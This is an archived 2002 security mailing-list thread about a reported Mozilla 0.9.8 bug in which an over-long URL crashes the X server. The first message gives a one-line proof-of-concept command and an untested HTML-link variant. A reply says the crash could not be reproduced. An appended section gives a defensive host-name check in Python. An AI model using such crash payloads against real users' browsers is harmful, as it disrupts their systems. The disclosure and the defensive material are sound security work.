On Sun, 2002-02-17 at 17:48, NyQuist wrote:
> On Sun, 2002-02-17 at 16:24, Replugge [Rod] wrote:
> > NOTE TO THE MODERATOR: This was sent yesterday but I guess didn't
> > make it since this doesn't seem to affect Red Hat itself; it affects
> > the mozilla packages distributed by Ximian:
> >
> > The test system looks like:
> >
> > bash#~ rpm -qa | grep mozilla
> > mozilla-0.9.8-1.ximian.2
> > mozilla-mail-0.9.8-1.ximian.2
> > mozilla-xmlterm-0.9.8-1.ximian.2
> > mozilla-devel-0.9.8-1.ximian.2
> > nautilus-mozilla-1.0.6-ximian.4
> > mozilla-psm-0.9.8-1.ximian.2
> > kdebindings-kmozilla-2.1.1-1
> >
> > This was tested in both RH7.1 and 7.2 with Ximian Gnome (with all
> > the updates).
> >
> >
> > There is a bug in mozilla 0.9.8-1 which allows you
> > to crash the X server.
> >
> > I won't go into details, I'll just show the proof
> > of concept.
> >
> >
> > exploit:
> >
> > Local:
> > bash#~ mozilla `perl -e "print '%20' x 2618"`
> >
> >
> > Remote:
> > I haven't tested this but I guess:
> >
> > echo "<a href=http://`perl -e "print '%20' x 2618"`>attack_me</a>" >>
> > ./attack.html
> >
> > perhaps using "img src" or JavaScript...
> >
> >
> > Best Regards
> >
> > --
> > /*
> > Rodrigo Gutierrez <rodrigoat_private>
> > Trustix AS http://www.trustix.com
> > */
>
> On one box: rpm -qa | grep mozilla
> mozilla-chat-0.9.7-1
> mozilla-mail-0.9.7-1
> nautilus-mozilla-1.0.6-ximian.6
> mozilla-0.9.7-1
> mozilla-devel-0.9.7-1
> mozilla-js-debugger-0.9.7-1
> mozilla-psm-0.9.7-1
> mozilla-dom-inspector-0.9.7-1
>
> Results in "www.perl -e "print %20 x 2618".com could not be found (lol)
> perl -e "print '%20' x 2618" prints %20 (2618 times) and doesn't
> overflow perl.
>
> On other box: rpm -qa | grep mozilla
> nautilus-mozilla-1.0.6-ximian.6
> mozilla-psm-0.9.8-2
> mozilla-0.9.8-2
> mozilla-devel-0.9.8-2
>
> Results in same 'not found' error.
>
> The attack.html (as per your script) results in "www.'perl not found".
> So if it does crash your X, it wasn't present in 0.9.7-1 and is fixed in
> 0.9.8-2.
>

Oops, did miss the `' thing :) But even with the right switch
`perl - "print '%20' x 2618"` just brings up an empty error box with
mozilla-0.9.8-2. Galeon actually shows the URL (%20 2618 times), and I've
tried x 5000 just to see if it overflows.

> --
> NyQuist | Matthew Hall -- NyQuist at ntlworld dot com
> Sig: Microsoft sells you Windows. Linux gives you the whole house.
>
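The thread turns on a URL whose host part is 2618 percent-encoded spaces: a string that no resolver can ever look up, yet one that the browser still hands to its error dialog. As an added illustration that is not part of this thread and not Mozilla's code, the check below shows the kind of host-name sanity test a URL handler can apply before an attacker-controlled string reaches the resolver or the UI. It assumes the RFC 1035 limits (253 characters per host name, 63 per label) as the policy, and its sample URLs are constructed here for the demonstration.

```python
"""Added example (editor's illustration, not code from the thread or from
Mozilla): reject host names that cannot be valid DNS names before they are
passed on to a resolver or rendered in a dialog."""
from urllib.parse import urlsplit, unquote

MAX_HOST_LEN = 253   # RFC 1035: total length of a host name (assumed policy)
MAX_LABEL_LEN = 63   # RFC 1035: length of one dot-separated label


def host_is_sane(url: str) -> bool:
    """Return True only if the URL's host part is a plausible DNS name.

    The host is percent-decoded first so that runs of %20 (the pattern
    from the thread) are judged by what the resolver would actually see.
    """
    try:
        parts = urlsplit(url)
    except ValueError:
        return False            # unparsable URL: nothing sane to resolve
    host = unquote(parts.hostname or "")
    if not host or len(host) > MAX_HOST_LEN:
        return False
    for label in host.rstrip(".").split("."):
        if not label or len(label) > MAX_LABEL_LEN:
            return False
        # Only letters, digits and interior hyphens are allowed in a label.
        if not all(c.isalnum() or c == "-" for c in label):
            return False
        if label.startswith("-") or label.endswith("-"):
            return False
    return True


# Constructed inputs: the pattern discussed in the thread and a normal URL.
POC_URL = "http://" + "%20" * 2618
NORMAL_URL = "http://www.trustix.com/"

if __name__ == "__main__":
    for u in (NORMAL_URL, POC_URL):
        print(f"{u[:40]:<40} sane={host_is_sane(u)}")
```

Running the block prints `sane=True` for the normal URL and `sane=False` for the 2618 x `%20` host, so the over-long string never reaches the code paths (resolver error dialog, rendering) that the reporter and NyQuist were exercising.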
This archive was generated by hypermail 2b30 : Sun Feb 17 2002 - 20:42:45 PST